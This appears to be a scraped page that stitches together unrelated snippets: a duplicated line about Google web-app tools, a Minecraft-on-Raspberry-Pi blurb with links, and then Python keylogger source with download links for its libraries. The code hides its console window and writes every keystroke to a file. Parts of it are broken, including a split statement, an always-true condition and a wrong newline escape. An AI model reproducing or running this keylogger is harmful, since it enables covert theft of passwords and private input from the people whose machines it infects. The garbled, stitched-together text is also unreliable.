Writing a web app is actually pretty simple when using the free tools that Google provides.
Writing a web app is actually pretty simple when using the free tools that Google provides.
Minecraft is now available for the Raspberry Pi. Not only that, but it’s a hackable version that allows you to write scripts for the game using python.
Martin O’Hanlin’s blog – http://www.stuffaboutcode.com
Minecraft Python Block List – http://goo.gl/raZkd
Raspberry pi beginners guide – http://goo.gl/PVZWa
Raspberry Pi Playlist – http://goo.gl/OkNQU
KEYLOGGER SOURCECODE AND
– Download Python: http://www.python.org/
– Download Pyhook: pyhook.sourceforge.net
– Download Python for Windows Extensions: http://sourceforge.net/projects/pywin32/
SOURCE:
import win32api
import win32console
import win32gui
import pythoncom, pyHook
win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)
def OnKeyboardEvent(event):
if event.Ascii==5:
_exit(1)
if event.Ascii != 0 or 8:
f=open('c:output.txt','r')
buffer=f.read()
f.close()
f=open('c:output.txt','w')
keylogs=chr(event.Ascii)
if event.Ascii==13:
keylogs='/n'
buffer +=
keylogs
f.write(buffer)
f.close()
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()